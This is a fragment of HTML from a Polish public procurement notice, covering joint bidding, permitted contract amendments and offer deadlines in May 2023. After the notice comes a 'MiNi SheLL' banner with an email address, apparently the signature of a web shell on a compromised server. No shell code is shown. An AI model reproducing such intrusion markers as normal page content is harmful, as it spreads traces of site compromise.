warunków udziału w postępowaniu: <span class="normal">Załącznik nr 4 - Wykaz wykonanych usług</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> . Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w następujących okolicznościach:<br/>a) Zmiany wynagrodzenia w przypadku zmiany stawek podatku VAT, wynikających z obowiązujących w tym zakresie przepisów.<br/>b) Zmiany wynagrodzenia umownego w przypadku ograniczenia zakresu przedmiotowego umowy.<br/>c) Zmiany zakresu umowy, z uwzględnieniem zapisu § 8 ust. 1 lit. b), w jakim realizacja Umowy jest niemożliwa do wykonania, wskutek okoliczności niezależnych od stron Umowy, których nawet przy dołożeniu należytej staranności nie mogły one przewidzieć, w szczególności: zjawisk atmosferycznych wpływających na możliwość wystąpienia podtopień, lub innych zjawisk naturalnych lub wynikających z sił przyrody mających wpływ na brak dostępności poszczególnych obszarów podlegających Umowie.<br/>2. Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy Wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.<br/>3. Wszelkie zmiany wprowadzone do umowy dokonane będą z poszanowaniem obowiązków wynikających z przepisów prawa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem platformy e-zamowienia https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-17 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com